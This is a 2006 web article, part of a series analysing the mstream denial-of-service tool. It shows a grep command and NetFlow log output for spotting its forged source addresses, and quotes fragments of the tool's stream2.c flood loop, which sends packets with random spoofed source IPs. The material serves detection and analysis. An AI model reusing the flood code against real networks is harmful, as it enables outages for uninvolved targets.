
The distributed denial-of-service attack tool mstream (part 2)

2006-07-04 20:26:58  Source: WEB开发网

Running the following command over the logs produced by Cisco Net Flows (it filters for IP addresses whose dotted-decimal form contains an octet equal to 0) reveals the presence of the attack:

--------------------------------------------------------------------------
% grep "[ \.]0[ \.(]" ddos-000415
Apr 15 04:12:08 tcp 82.0.151.5(29497) -> 192.168.10.5(27072), 1 packet
Apr 15 04:12:18 tcp 207.0.149.32(21893) -> 192.168.10.5(3913), 1 packet
Apr 15 04:12:33 tcp 0.147.151.82(10473) -> 10.4.152.237(2810), 1 packet
Apr 15 04:13:39 tcp 60.0.33.36(41079) -> 10.4.152.237(31754), 1 packet
Apr 15 04:14:03 tcp 103.140.148.0(4247) -> 10.4.152.237(29689), 1 packet
Apr 15 04:14:15 tcp 214.1.99.0(46714) -> 10.4.152.237(22524), 1 packet
Apr 15 04:15:11 tcp 10.148.60.0(12276) -> 192.168.10.5(31122), 1 packet
Apr 15 04:15:20 tcp 0.112.67.108(4550) -> 192.168.10.5(63787), 1 packet
Apr 15 04:15:33 tcp 13.0.16.2(39092) -> 10.4.152.237(57998), 1 packet
. . .
Apr 15 06:45:24 tcp 18.167.171.0(54104) -> 10.200.5.8(32779), 1 packet
Apr 15 06:45:52 tcp 0.23.15.38(45621) -> 10.200.5.8(20780), 1 packet
Apr 15 06:46:14 tcp 0.12.109.77(38670) -> 10.200.5.8(47776), 1 packet
Apr 15 07:19:12 tcp 199.120.0.72(64912) -> 10.4.152.237(45151), 1 packet
Apr 15 07:27:37 tcp 0.28.232.21(52533) -> 10.4.152.237(338), 1 packet
Apr 15 07:28:13 tcp 99.61.233.0(20951) -> 10.4.152.237(58427), 1 packet
Apr 15 07:31:23 tcp 195.0.3.111(17193) -> 10.4.152.237(14601), 1 packet
Apr 15 07:32:19 tcp 61.108.245.0(24309) -> 10.4.152.237(32809), 1 packet
--------------------------------------------------------------------------

It should be pointed out that some of the forged source IPs are broadcast addresses, multicast addresses or subnet addresses, which brings some further problems of its own (see reference [12]).

Looking at the source code of stream2.c, many of the IP and TCP header fields are randomized, but some values are still static (the TCP window size is fixed at 16384, for instance):

packet.ip.ip_id = rand();
. . .
packet.tcp.th_win = htons(16384);
. . .
packet.tcp.th_seq = random();
. . .
packet.tcp.th_sport = rand();
packet.tcp.th_dport = rand();
. . .
while ( time( 0 ) <= endtime )
{
    if ( floodtype != 0 )
    {
        i = 0;
        /*
         * until list exhausted
         */
        while ( arg4[i] != NULL )
        {
            /*
             * valid ip
             */
            if ( strchr( arg4[i], '.' ) != NULL )
            {
                packet.ip.ip_dst.s_addr = inet_addr(arg4[i]);
                cksum.pseudo.daddr = inet_addr(arg4[i]);
                s_sin.sin_addr.s_addr = inet_addr(arg4[i]);
                cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random();
                packet.ip.ip_id++;
                packet.tcp.th_sport++;
                packet.tcp.th_seq++;
                s_in.sin_port = packet.tcp.th_dport = rand();
                . . .
            }
        }
    }
}
